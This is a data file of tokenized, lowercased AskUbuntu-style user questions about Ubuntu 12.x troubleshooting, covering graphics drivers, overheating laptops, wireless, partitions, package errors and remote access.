266002	how can i unistall evolution without removing gnome ?	i 'm running ubuntu 12.10 with the gnome desktop . when i installed gnome , it automatically installed evolution mail client . i 'd like to remove evolution , but when i try to uninstall it through the software center , it wants to remove gnome-core as well . is there a way to uninstall evolution without removing any of the gnome software ?
266009	how do we get canonical to fix their certificates ? i ca n't access ubuntu wiki	i 'm getting certificate errors when accessing ubuntu wiki . this is forcing me and i assume others who have rigorous security with their web browsing to create exceptions for these sites . they have inappropriate certificates from godaddy that does n't match their urls . this is preventing me access ( without intervention at the firewall ) . can this be fixed with a new certificate or must i ( and everyone else that is security conscious ) make an exception at the firewall ? here 's the error : untrusted website while trying to retrieve the url : https : //wiki.ubuntu.com/raid ( add exception for this url ) status hostname does n't match subject /o=*.canonical.com/ou=domain control validated/cn=*.canonical.com issuer /c=us/st=arizona/l=scottsdale/o=godaddy.com , inc./ou=http : //certificates.godaddy.com/repository/cn=go daddy secure certification authority/serialnumber=07969287 sha1 fingerprint fb:99 : c5 : ca:22:9f : fd : a9:5d : af : c1 : eb:64 : ba : ae : cc:97 : da:7f:02 md5 fingerprint 89:95:3b:97:07 : fc:0d:3e:41 : d4:92:34:42:18:61:71 valid from jun 12 05:00:31 2012 gmt valid until jun 17 21:08:04 2013 gmt
266013	fontconfig warning : `` msfonts-rules.conf '' , line 23:	how can i fix this message : fontconfig warning : `` msfonts-rules.conf '' , line 23 : having multiple values in < test > is n't supported and may not works as expected
266016	dual monitors on ubuntu ?	simple things in ubuntu often seem to require annoying , long google-hunts - however as a scientist , i love ubuntu because complicated things are never harder than they need to be . i 'm looking to understand how certain problems arise and persist in ubuntu , rather than to find actual fixes to the problems . i used to connect to my linux box remotely to use it , however i mostly use it now rather than windows , so moved an asus 1920x1080 monitor onto it . it detected the screen straight away and ran without any problems . the graphics card is a radeon hd4870 1gb , and i have a new radeon hd7750 which will be added when i move to three monitors . i am using the latest fglrx driver , as i also play a few games and do the odd bits of data visualisation . i have since removed the asus and added 1920x1200 and 1920x1080 dell monitors to it , intending to have the 1080 to the right of the 1200 . addition of a second monitor has been problematic : ubuntu by default insists on overlapping ( note : not cloning ) the monitors , so they 're both showing the workspace from ( 0,0 ) , with the 1080-high monitor clipped at the bottom . changes to this via the kde display manager get ignored and reverted without any error messages . the amd catalyst `` administrative '' launcher shortcut asks me for the admin password endlessly , telling me that i 've got it wrong each time i try . i have to manually `` gksudo amdcccle '' , then type in the exact same password in order to open catalyst in `` administrative '' mode . after changing the monitor settings in catalyst , i am told that i have to reboot in order for my changes to take effect . even my windows box does n't have this requirement , and windows seems to request reboots at every possible opportunity . while i do n't need help solving this problem ( once i 've tracked down where the config files have moved to in ubuntu since i last had to do this manually ) , i am interested as to why the graphics side of ubuntu is so incomplete . surely i 'm not the only ubuntu user who has a multi-monitor setup ? another such problem occurred a few years ago , when i upgraded ( from 8.xx to 9.xx i think , neither were betas ) . on the old version , bluetooth worked flawlessly . on the new version , my openoffice suite had been replaced without consent by the virtually identical libreoffice , and more annoyingly , my working bluetooth drivers had been needlessly replaced by some that did n't work at all and caused crashes . do these new packages actually get tested at all before release ? why do updates get released that completely replace software ( with some other software , not an upgrade ) without explicitly consenting the user first ? as a bonus , are there any distros out there that have graphics with comparable reliability to windows and that put users ' preferences first when updating ?
266018	unity crashed after nvidia driver install	on fresh ubuntu install , the first thing i did was install the latest nvidia drivers . after reboot , unity disapeared . only the mouse and the wallpaper were there . i was using 64-bit ubuntu . how to fix this ? ps i have desktop
266019	ubiquity does n't find my partitions	i 'm trying to install ubuntu 12.10 and make a dual-boot scheme with windows 8 . i 'm following these instructions . but the installer does n't list the partitions ( it even shows that dialog to choose between a full-disk install or do the process manually ) : but the ubuntu can see the partitions ( and i can mount them in nautilus ) : ( full size image ) as you can see , i already resized my main partition to install ubuntu in that `` free space '' . some more outputs to describe better the problem : ubuntu @ ubuntu : ~ $ sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 256 heads , 63 sectors/track , 121126 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x84dec887 device boot start end blocks id system /dev/sda1 1 4294967295 2147483647+ ee gpt warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 32.0 gb , 32017047552 bytes 256 heads , 63 sectors/track , 3877 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x180cb215 device boot start end blocks id system /dev/sdb1 1 4294967295 2147483647+ ee gpt and : ubuntu @ ubuntu : ~ $ sudo parted -l error : the backup gpt table is not at the end of the disk , as it should be . this might mean that another operating system believes the disk is smaller . fix , by moving the backup to the end ( and removing the old backup ) ? fix/ignore/cancel ? c warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! how can i fix this without harm the windows installation ? edit after rod 's answer i confirm that hpa is disabled . i do n't understand this raid thing , but my setup has two hard disks , one with 1tb and another one with 32gb ssd . the last is used as a cache . this thing is called intel rapid storage technology . as far as i can tell , it `` uses '' raid . so i do n't want to disable it in windows . how to proceed ?
266020	ubuntu 12.10 boots to a black screen - intel hd graphics	i am a new to linux . i have an hp pavilion dm4-1160us laptop . it has only one video card built-in ( intel hd ) , however ubuntu seems to have a hard time with it . it started when i tried to boot from a livecd - it booted into a black screen . once i changed it `` acpi=off '' it booted up fine . i then installed ubuntu 12.10 32 bit ( wiping the hdd ) , however when i rebooted it was to a black screen again . i did some research , noticed that my graphics show as `` unknown '' and installed mesa-tools through apt-get . it then showed my graphics to be `` intel速 ironlake mobile x86/mmx/sse2 '' but whenever i reboot it would again boot to a black screen . i tried installing ( i think this is right ) sna from xorg but it still would not work . i really want to get linux on my laptop but i am kind of at a loss here . please help !
266024	ntfs corrupted hdd	i just installed a new hdd in my computer . i booted up and formated it in ntfs and copied about 500 gb of videos onto it . my computer ( few hours later ) froze while a was watching a video off that drive . i had to do a hard reset . upon reboot the computer tried to boot of that drive which gave me an bootmbr missing error which i than followed by changing the boot order . now that drives does n't show up in my unity taskbar ( to be mounted ) . the disk utility now shows that the drive has 2 unallocated partitions and 2 partitions of unknown type and content ( which previously only had 1 partition ) . disk utility image calling a fdisk for that drive gave me the following : sudo fdisk -l /dev/sdb [ sudo ] password for zereox : disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x2052474d this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdb1 ? 6579571 1924427647 958924038+ 70 disksecure multi-boot partition 1 does not start on physical sector boundary . /dev/sdb2 ? 1953251627 3771827541 909287957+ 43 unknown partition 2 does not start on physical sector boundary . /dev/sdb3 ? 225735265 225735274 5 72 unknown partition 3 does not start on physical sector boundary . /dev/sdb4 2642411520 2642463409 25945 0 empty partition table entries are not in disk order i have n't tried to format the drive as i hope to save something from it , but does anyone know of how to fix it ?
266025	hybrid intel/amd radeon problem	i have a dell inspiron 7520 which is ubuntu certificated . i installed ubuntu 12.10 64 bit . now i have problem with the fan control ( noise ) because of the hybrid system . i tried some tutorials but they did n't worked very well . i have a intel hd graphics 4000 amd radeon hd 7730m in my laptop . hope anybody can help me . cheers
266026	skype and vlc icons disappear from the menu bar	i started using ubuntu 3 days ago , but i do n't know how to open skype and vlc programs because their icons disappeared from the menu . i have already read answers to other people with similar problems , but i do n't understand most of the technical language . can anyone help me ? thanks for by part of that amazing community of ubuntu ... i 'm free of windows , at least !
266028	upgrading to ubuntu	i really like the open source ideology and am thinking of installing ubuntu . currently i 'm using windows 8 but my computer was originally windows 7 . much of the software i currently have on my computer i would need to keep . is this possible ? i could do with keeping microsoft office ( i know ubuntu supports office files but i would like to be able to create files in the office format for work reasons ) . i also need to do .net framework programming . i know you can set up a virtual machine to do this but is it difficult and what kind of problems do people often encounter doing this ? thanks for the help .
266033	permissions for video folder for minidlna ?	i have a secondary hard drive that is mounted as /media/media and i would like to user a folder called videos located on that drive that i would like to share the videos located on this folder out via minidlna . i have minidlna working with /home/jonathan/videos which is on my smaller drive and would like to instead move the videos to the larger drives . however after i edit my minidlna.conf to point to the /media/media/videos folder and do a sudo service minidlna force-reload to reload the database i get a permssions error . can someone point me to the correct permissions i need to set on this folder ?
266039	getting the following error message in wine when i try to run exact audio copy	i just recently figured out how to install wine1.5 . my primary purpose is to use exact audio copy without having to reboot back to windows . i re-downloaded the installation executable , ran it , and installed it into my external hard drive . when i then tried to get wine to run it , it will give me the initial `` exact audio copy is starting up ... please wait ! '' but then a second window opens . the second says the following message : '' unhandled exception - [ x icon ] at 0207adf0 - > access violation '' cancelling the window or hitting `` ok '' cancels wine entirely . any ideas ?
266042	integrate facebook messenger ( not chat or facebook )	i have a problem . i do a lot of collaborative work at university , and the main method of communication ( and most convenient ) for students use is facebook . i would love to integrate facebook messages with ubuntu . i know this is almost possible with pidgin , but this is only really for chat , it does n't allow me to be offline or see offline messages . it also constantly tells me people are going on and offline as i basically have every person i 've ever met on there , and most of they check facebook on an hourly basis . i 've seen android apps which have this functionality , so there must be an api for it . is there an ubuntu app which handles this nicely ?
266046	brightness function keys not working	i have an asus x55a-spd0204o laptop . the rest of the fn+fx ( where x = number ) like sound + - mute , screen turn off , wireless etc . work perfectly . the problem is with the 2 brightness keys . they just wo n't work . any suggestions ?
266050	i set xgamma at startup in 12.10 , but it resets	i have a startup command to set my gamma in xgamma ; whenever i log in , it flickers briefly to what i have it set to , then goes back to 1 . why ? is there a better way to adjust gamma defaults in 12.10 ?
266053	usb mouse does n't work/gets stuck on ub 12.10 , kernel 3.8.1 and asus n56v	all of my ports are usb3 ports . i installed ubuntu and the mouse does n't work , restarted , still does n't work , upgraded kernel to 3.8.1 , no change . touchpad works fine . some debug info : there is a /dev/input/mouse0 . lsusb : bus 003 device 003 : id 0458:003a kye systems corp. ( mouse systems ) netscroll+ mini traveler / genius netscroll 120 dmesg | tail -n10 ( i did the disconnect to show it recognizes it ) [ 1124.544481 ] usb 3-1 : > usb disconnect , device number 7 [ 1130.511890 ] usb 3-1 : > new low-speed usb device number 9 using xhci_hcd can you please give me an advice how to make the mouse work ? thank you edit : go to bios ( hold f2 on start ) , find advanced - > usb configuration - > enable xhci pre-boot mode . this makes mouse work until suspending the laptop , then it gets stuck . reconnecting helps but it is tedious .
266057	ca n't get touchegg to work with my touchpad	im sorry guys . i dunno if anyone 's willing to help me and i 'm just wasting my time here . but i 've been poking around on the internet for days trying to find a way to get my synaptics touchpad ( acer aspire one d255 ) to work . i 've been using touchegg ( the gui tool ) to troubleshoot . i could only get two finger scrolling to work ( from ubuntu settings ) . other gestures ( 2 fingers ) , like `` pinch-to-zoom '' , `` tap '' , `` flick '' etc . just do not work . i do n't know what to do to fix it . there is support on windows for these gestures . i 'm asking for someone to please set aside some time to help me . thanks .
266063	display listed as laptop	i 'm using 12.04 on a desktop -- i installed with a cd ; i installed by usb earlier , while wubi produced an error ( i only tried this method once ) . while running precise from the cd or usb , the display was fine -- it was listed as a dell 15-inch . do i need to get a new hdd ? ; i did n't have this problem on the old drive .
266065	how to network in ubuntu client on windows host ?	i have ubuntu 12.10 installed on my windows7 on vbox . is it possible to access disks and folders from the windows host like system c drive or d drive ? or maybe networking between both machines to access windows host folders ? thanks in advance , any answer will be considered sincerely
266066	how should i troubleshoot this weird ssd issue ?	i 'm having a confusing issue with my ssd . i will describe some of the symptoms . randomly the gui will crash . the launcher and panel disappear , programs wo n't launch and eventually everything blanks out . i can switch to another tty , but when i try to log in i get the message i/o error , dev sda , sector [ some sector number ] i then have to force reboot my machine at which point the bios fails to recognize my disk and leaves me at a blank command prompt . the first time this happened , i thought my drive was dead , but it turns out if i just shut down my machine and start it back up , the drive appears again and i can boot into ubuntu . it seems like everything points to a failing drive . but besides this issue i ca n't find any evidence of this . all the smart tests are positive . i 've run e2fsck on both partitions and it seemed to be fine . i rad badblocks to check for bad sectors and nothing was found . i 've checked dmesg after an incident and nothing jumps out . most importantly , this issue is reproducible . as long as i force shut down , then bring the machine back up , everything is fine for an hour or so . if i reset the machine , the bios ca n't load the drive . i 've done this probably 10 times now and the results are always the same . i just do n't know what else to check now . i 'm fine with getting a new drive if i need to , but since i ca n't actually prove that it 's broken , i do n't want to replace it unnecessarily . basically , can anyone recommend any other tests or debugging steps to prove one way or another the state of my disk ? at tom brossman 's suggestion , i tried switching the sata port used by the drive . this had no effect . i also changed sata cables which did n't work either . here 's the output of e2fsck . here 's the output of `badblocks -v' drive information smart status
266068	the package system is broken : i ca n't update my apps on ubuntu 12.10 64bit	screen shot : text : '' check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f '' details : the following packages have unmet dependencies : fgfs-models-base : flightgear : depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu20 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.7.2-2ubuntu1 is installed depends : libstdc++6 ( > = 4.6 ) but 4.7.2-2ubuntu1 is installed depends : libudev0 ( > = 147 ) but 175-0ubuntu13 is installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.7.dfsg-13 is installed
266073	can not connect to ubuntu samba server using dolphin	server info ubuntu 12.04 32bit on toshiba laptop connection ethernet client info powerbook g4 powerpc dual booting mac osx 10.5.8 and debian wheezy kde problem i know that the server is working just fine because when booted into mac osx on the powerbook i am able to connect to the ubuntu server very easily . when i reboot into debian kde and try to connect using dolphin , i go to `` samba shares -- > workgroup '' and after clicking on the `` workgroup '' icon , dolphin just hangs and at the bottom right i see the error `` connection time out '' please let me know if i can provide any additional information . thank you . update //////////////// i am able to connect to the server now using nautilus but i have to manually enter the ip address of the server . however i would like to be able to connect using dolphin .
266076	noisy fan ubuntu 12.10 , not that noisy on windows	i am using a dell inspiron 7520 . i have a amd radeon hd 7730m working in switching with an intel hd 4000 . i have the lastest drivers from amd so my switching is working flawlessly . i have made some script described in another post : sleep 5 & & echo `` min_power '' | tee /sys/class/scsi_host/host*/link_power_management_policy usually , i am using echo `` min_power '' | tee /sys/class/scsi_host/host*/link_power_management_policy it worked fine with the open source graphic driver but right now on the performance gpu my fan is always running . it is good for the hardware but not for me after a while . thank you ! p.s i do n't know if it could be of any use , i run my interface with gnome classic , i have installed gnome-shell then changed my interface from there to get more performance on eve .
266079	problem to connect to a wireless router in ubuntu 12.10	i have a problem with connecting to a wireless router , when i chose the network in the panel , is asks to enter the key , i do , but after that he still try to access the network , but nothing happens , and it ask me again to enter the key . network is 100 % working with windows .
266081	high temperatures in ubuntu 12.10 ( 64 )	to the experienced , i think reach dangerous temperatures in laptop with ubuntu . the version is 12.10 and the extras just installed lm-sensors and java . root @ ubuntu : / home / ricardo # sensors acpitz-virtual-0 adapter : virtual device temp1 : +79.0 ° c ( crit = +99.0 ° c ) temp2 : +29.8 ° c ( crit = +99.0 ° c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +90.0 ° c ( high = +86.0 ° c , crit = +100.0 ° c ) core 0 : +90.0 ° c ( high = +86.0 ° c , crit = +100.0 ° c ) core 1 : +88.0 ° c ( high = +86.0 ° c , crit = +100.0 ° c ) this windows walks in their 50 º c , but linux is a heater that melts the battery quickly . the laptop is a samsung 300v3a s03pt , i5 second generation , intel hd 3000 and nvidia does not interest me install gt 520m . i tried that already has linux driver optimized . what can i do ? the bios it is updated , the fan runs at background , and yes it is only on linux .
266084	which bios can ignore integrated graphics card and just using discrete graphics card ?	i use a laptop of gt630m , ubuntu 12.04 64 bits . here is my bios information : sam @ sam : ~ $ sudo dmidecode -t bios # dmidecode 2.11 # smbios entry point at 0x000f04c0 smbios 2.7 present . handle 0x0000 , dmi type 0 , 24 bytes bios information vendor : american megatrends inc . version : k55vm.202 release date : 03/13/2012 address : 0xf0000 runtime size : 64 kb rom size : 6144 kb characteristics : pci is supported bios is upgradeable bios shadowing is allowed boot from cd is supported selectable boot is supported bios rom is socketed edd is supported 5.25 '' /1.2 mb floppy services are supported ( int 13h ) 3.5 '' /720 kb floppy services are supported ( int 13h ) 3.5 '' /2.88 mb floppy services are supported ( int 13h ) print screen service is supported ( int 5h ) 8042 keyboard services are supported ( int 9h ) serial services are supported ( int 14h ) printer services are supported ( int 17h ) acpi is supported usb legacy is supported smart battery is supported bios boot specification is supported targeted content distribution is supported uefi is supported bios revision : 4.6 handle 0x0018 , dmi type 13 , 22 bytes bios language information language description format : long installable languages : 1 en|us|iso8859-1 currently installed language : en|us|iso8859-1 sam @ sam : ~ $ what to do next ? thank you~
266090	flash video in full screen system failure	i have recently reinstalled ubuntu 12.04 and replaced hard drives and video cards ( both nvidia ) but changed drivers as i went from a 7600gt with the 173 driver to gt 640 with 310 driver . i had some success before ( only hd videos would cause this issue ) and now it is easily repeatable for me regardless of other circumstances . open browser of choice ( tested opera , chromium , firefox , chrome ) to flash content play flash content in full screen watch pc shut off from failure i can play team fortress 2 in hd 1080p . i can watch 1080p content from enormous mkv files or html5 from youtube . i can play flash content in 720p from a vm on the pc and not have any issues so i do n't think it is a power supply issue or a pc hardware issue . however , something is amiss and i can not find this issue anywhere . help would be appreciated . it is something that ( while it can be lived with ) is annoying to say the least .
266097	how can i determine what command a given keybinding is invoking ?	the key chord winkey-p ( hold down the right winkey and press `` p '' ) causes my monitor configuration to cycle through some very strange and suboptimal settings . it seems that whatever is causing this this is happening before my window manager is catches the event , because putting a window-manager binding on top of it does not change the behavior . it actually happens with multiple window managers ( sawfish and metacity ) and multiple accounts ( my regular and root . ) how can i figure out what command is being invoked when i press these keys ? it 's not showing up when i run top , even when i run it with the minimum delay and mash winkey-p repeatedly . ( this is actually on a linux mint 12 system . hope that 's close enough , since this is basically a generic linux question . )
266098	fortran syntax in geany	i use geany 1.22 in ubuntu 12.04 , but it is n't highlighting fortran syntax . what is the solution ?
266099	how to burn ubuntu to disc for a pc that has no operating system ?	how do you burn ubuntu to a cd 700mb for a laptop that has no operating system ?
266100	dell inspiron 1545 wireless driver not working in ubuntu 12.10 64-bit	i have used mythbuntu , ubuntu 12.10 32-bit os , and they have all worked properly with the wifi driver which is apparently the broadcom 4312 . then i deleted the linux partitions , rebooted with ubuntu 12.10 64-bit because that was the only 64-bit version i could find . i did it through usb boot , installed alongside my windows 7 . i noticed before installing that it could n't detect wifi connections so i used ethernet . it installed as quickly as the 32-bit version of 12.10 . i finally got to the desktop environment after rebooting , and i noticed that i still could n't connect to my wireless internet . i 've browsed for hours and hours to get it working , but i still have found no answer . i hope someone can help give me a working yet simple solution . if not then i guess lay it down on me the hard way .
266101	how to get 3 monitors to work ?	installed ubuntu 12.10 on my 1tb hdd . system specs : i7 2600k 16 gb ram gtx 590 ( running all 3 1080p monitors ) gtx 560 ti - would like to dedicate to physx problem : major nvidia driver stability issues on ubuntu 12.10 . i have tried : installing proprietary drivers installing open source drivers installing experimental 310 drivers results ( all of these have occurred on multiple drivers listed above ) : everything freezes within a minute of logging in . i log in and there is no unity sidebar or bar at top of screen . xinerama was really slow and i could n't adjust the screens . sometimes it will work for a little while then everything will start freezing up . my questions : will my setup work on any version of ubuntu or linux ? if i get it running will it be stable ? would i be better off running windows 7 ultimate ? ( i 'm tech savvy but ca n't be spending 50 % of my time trying to figure out what's wrong with my computer . ) any advice ? should i give up on ubuntu ?
266102	xubuntu 12.10 disable lower power beep	how do you disable the lower power beep within xubuntu 12.10 ?
266104	how do i configure fcitx googlepinyin im ?	i 've installed the fcitx googlepinyin wrapper im , opened the `` fcitx configure tool '' and ca n't seem to add any input methods . am i missing something ? any other recommendations for a pinyin input method would be appreciated . bayka
266106	where can i find the old gdm2 ubuntu login theme ?	i 've installed the mint display manager ( based on the old gdm2 code ) . i 'm looking for the most recent gdm2 theme that shipped with ubuntu before they moved to lightdm , something that looks similar to this : i 've tried extensive googling . no luck .
266112	how do i share my wireless connection via a wired cable ?	im trying to share the wireless from my netbook eeepc to my desktop computer that does not have any wifi , it can run internet through a cable connected to my internet router but im wondering if there is any way to share my netbooks wireless through the ethernet cable . the desktop is running on 12.04 and the eeepc is running on 12.10
266115	how to make ubuntu server 12 read keyboard input by the password line on login ?	i have recently installed ubuntu server on my machine - successfully . however , the system does not read my keyboard input on the password on login . is there something i did not do right ? how do i go about fixing this problem ?
266116	how can i increase battery life in ubuntu ?	i really like ubuntu , and i want to work with it always instead of windows . but the problem i find is that the battery runs out very fast ( < 2 hours ) when i use ubuntu . it would have been great if i could get like 3 - 4 hours of battery life . my windows provides me 4.5 - 5 hours . is there any way to increase battery backup ? i have tried to disable my amd radeon graphics by adding radeon to blacklist . but still there is a lot of heating . my laptop is a compaq presario cq43 . and i 'm running ubuntu studio 12.04 .
266122	vlc notification bubble delay - libnotify problem	i have a problem with vlc on ubuntu 12.04 lts.i have activated libnotify on vlc preferences but i noticed that the notification bubble delays when i change a few songs continuously.for a example lets assume that my playlist is sorted with letters of the english alphabet from letter a to f.if i want for example to listen to the song with the letter d i have to press the next button for 3 times.when i do that vlc will start playing the song with the letter d , but the notification bubble on the top left is still in the song with the letter a and gradually will change from one song to another and eventually will reach the song with the letter d which is the current one.so how can i make the notification bubble to follow my changes ?
266123	ubuntu package managers	as i am settling in on ubuntu after using other distros ( fedora , opensuse , peppermint ) . is useful to use another package manager ... say , yum , on ubuntu ? are there any benefits to using other package managers ? or am i not seeing this in the right way ?
266124	disable dash searching for files	i 've looked fairly extensively , so i hope this is n't a duplicate . i 'm wondering how to disable the dash search from searching for individual files ; i am fine with searching for folders and applications , but searching for individual files in the dash can be obnoxious sometimes .
266129	how does nautilus automatically create a quicklist of favorite places ?	right clicking the nautilus icon in the unity side bar brings up first a list of favorite locations , followed by the standard `` open a new window '' command . the `` new window '' command is defined in /usr/share/applications/nautilus.desktop , but the list of favorites is not . how does the .desktop file know to fill the launcher with the list of favorites ? where does this information come from ? is this some `` special property '' of nautilus , or can such `` favorites '' entries be defined by our own applications ?
266140	sansa clip not recognized	i just took the awesome plunge into linuxland , and am loving it so far ! i installed ubuntu 12.04 on a hp g74 laptop , and everything but my sansa clip is working great ! i can it in and see a few folders in the clip , but none of my music shows up , in rhythmbox or in folders . it is in msc mode , and it was in msc mode when i put the music on there ; though i was running win7 at that time . any help ? i tried the adding a blank .is_audio_player file to the root of the clip , but it did not help either . any help appreciated . thanks !
266143	i 'm trying to get ubuntu alongside with windows 7	when i get to the boot loader , i select ubuntu . it gives errors like software or hardware has recently been changed and to insert windows install disc . any ideas on how to fix ? i 'm new to this , i want to try ubuntu .
266146	how can i configure wired network connection on 64-bit ubuntu 12.04 lts ?	i 've just installed my first linux installation on a donated computer that i plan to network and use it as a shared storage drive for all of our pictures and videos . we have a dsl modem with both wired and wireless being available to this computer . at this point , wireless is not an option for us to use ( no antenna on the wifi card and we 're not going to put money into this machine ) but it was working out of the box when brought into really close range to the router . we have ran an ethernet cable from the router to the machine . unity informs us that the wired connection is disconnected.. it 's not ! after probing around on the internet i tried the following cat /etc/network/interfaces the following was returned ( from memory ) : auth lo iface lo inet loopback so , i added an eth0 portion to that file and saved it using pico . it then looked like : auth lo iface lo inet loopback auth eth0 iface eth0 inet dhcp and ran the following commands : sudo ifdown eth0 which just returned the command prompt , and then : sudo ifup eth0 which just hangs . then after rebooting it boots with network configuration disabled and i changed the /etc/network/interfaces file back to what it was . can someone help me get my wired connection working , or help me help you guys by providing you with more relevant information ? thanks ! -scott
266149	why does my hp probook 4530s get much hotter ?	my laptop details : - hp probook 4530 s processor : intel ( r ) core ( tm ) i7-2670 qm - cpu @ 2.20 ghz ( 8cpus ) , ~ 2.2 ghz memory 8192 mb ram about display card ( vga ) : device name : mobile intel ( r ) hd graphics manufacture : ati technologies inc. chip type : intel ( r ) hd graphics family dac type : internal approx.total memory : 779 mb monitor : generic pnp monitor about hard disc hitach hts547564age384 ata device about ubuntu 12.10 installation i installed ubuntu 12.10 from usb ubuntu 12.10 64 bit ubuntu partition size on my hard disc = 30 gb i do n't make `` linux swap '' during installation , because memory size ( ram ) = 8gb i already installed windows 7 - 64 bit.. and choose linux or windows to boot the problem is : the fan works loudly after booting ubuntu and during working with ubuntu , , unlike using widows in the same conditions ( i mean same room temp . , not running a big process ) ... i installed `` jupiter '' for handling this problem , , and also no big improvment ... the processor temp . starts about 40 deg . celsius after 10 min it becomes about 53 celsius without running a heavy process . what shall i do ? finally some times when shutting down ubuntu , , not work properly ! and do n't closed ! appear on the screen a message i do n't remember it now but i think '' terminate all running process ... `` and ubuntu still working without shutting down ! it occurs about 70 % times i use ubuntu after the processor temp = 65 degrees
266153	hodgepodge font problem	i did something wrong and i do n't what 's that , but it has caused hodgepodge fonts . in some websites such as blogger dynamic views , the problem occurs . please see the link . how can i fix this ?
266156	is there a gtk-theme preview application ?	is there an application which lets me preview all the theme-widgets at once ? like in the old ubuntu-tweak there was some sort of preview of all theme-button/slider/progressbar-layouts . but nowadays there isnt . can somebody help me with this ? with best regards , georg d端es
266160	byobu , ssh and an accidently closed fluxbox	so i was using fluxbox and had a terminal using ssh to connect to a server . this server automatically starts byobu for everyone who 's connecting to him . at least until i accidently closed my fluxbox while still having the ssh connection working . now only the ssh connections from my machine wo n't use byobu but pure ssh instead . it 's not that i mind that , actually i prefer it that way , but there is someone also using the machine i 'm using and he wants to have byobu starting automatically . and now i 'm in a tight spot , kind of at least . i do n't know how to activate the byobu session for a particular machine and i do n't know how it was deactivated for only this machine ? is it possible , that the old session is still active on the server and just waits to get finished ? and if that 's the problem , how do i finish it ?
266167	system crash after update - can not load lightdm	i 've been running 12.10 for ~ ( two weeks ) now and have had my fair share of trouble with it . of course , this has thought me a great deal of lessons of using ubuntu , the command line and linux in general . it also sparked my interests in open-source/free software and why it is so precious . i 've learned to respect the community and am actively learning my way through . now , last night i attempted to optimize my laptop power consumption and installed , amongst others , powertop . as far as i can recall , i did n't do anything dramatic to my system , except changing the power governor from ondemand to powersave . this morning the system goes into a flashing cursor in top left after boot . at this mode i ca n't enter tty-s using ctrl-alt-f ( 1-7 ) . so , i reboot - > advanced options for ... - > ... ( recovery mode ) - > root and attempted to play with lightdm as was done here . initially there was a problem with the /var/lib/dpkg/lock and /var/lib/apt/lists/lock . so i removed the locks . then tried dpkg-reconfigure lightdm and it worked ( no error messages ) . rebooted and started normally and this time even the cursor went fishing . so , no flashing , no i/o whatsoever ( to a mortal ) . then , went back to recovery - > root and did some of the listed options , namely : check the file systems ( fsck ) , update grub bootloader ( grub ) . tried to failsavex and that did n't start either . so , back to root shell and apt-get install -- reinstall lightdm i also set the power gov back to `` ondemand '' . also tried several other things , which are to my judgement , not worth mentioning . so , quite desperate . please give a pointer as to how to proceed . system specs : ubuntu 12.10 on a dell e6420 laptop . all worked out-of-the box with 12.10 , with the occasional crash upon system update . edit [ 1 ] : cat /etc/x11/default-display-manager returns /usr/sbin/lightdm when i try sudo service lightdm start system goes back into black screen with no i/o option . edit [ 2 ] : after some reading and testing , the problem emerged as wireless not working . so , connected to ethernet . then run the same commands as above ( udpated lightdm ) and log-in screen appeared , but could not connect . then , went back into tty1 and re-installed compiz and unity . then reboot and bam - works ! as to the many existing issues with linux , i could , with my lately gathered understandings and skills , generalize the main cause of errors in linux is the keyboard operator ( aka me ) . thanks !
266170	vnc wont connect to my server	this is probably the weirdest problem i have encountered yet . i use ubuntu desktop as a server host to the virtualbox software . i do not change ubuntu more than that i install nfs , samba , ddclient ( dns software ) , ssh and virtualbox . to access the host i need to have remote access to it . i connect to the host through vnc ( ubuntu desktop sharing software ) because xrdp does not let me connect to the same session . after i had re-installed the system and checked that samba and nfs shares , ssh , xrdp and vnc etc worked accordingly , connected to a screen , keyboard , lan-cable and mouse , it was time to move the server back to another room . i connect the server to the same router ( and even to the same router ports ) with a longer lan-cable ( both lan-cables are cat6 ) and start the server . now when i try to connect to the server through vnc i receive the message `` connection failed '' ... the funny thing is that nfs and samba shares work as do rdp ( but it opens another session ) . ssh does also work fine . the ip number is still the same and i can connect to the server with ssh externally . i have by now re-installed the system 3 times and now are lubuntu installed with x11vnc and still the vnc connection only works when everything is standing beside the screen and when i move it to another location vnc fails . i have tested other router ports and restarted the modem and router countless times . so i am out ideas by now please help br .
266171	continous heat issues with notebooks	my hp probook i bought 2 years ago had to be sent in because of heat issues . it worked for a while , now it 's getting too hot again . just shuts itself down . i bought a new notebook , a much cheaper and less powerful asus f55a which was said to stay cool in reviews . i already got psensor measuring 70 degrees celsius during normal use for the cpu which is said to be as much as a cpu can comfortably take . is there something wrong with ubuntu on notebooks ? i 'm on 12.04 64bit btw .
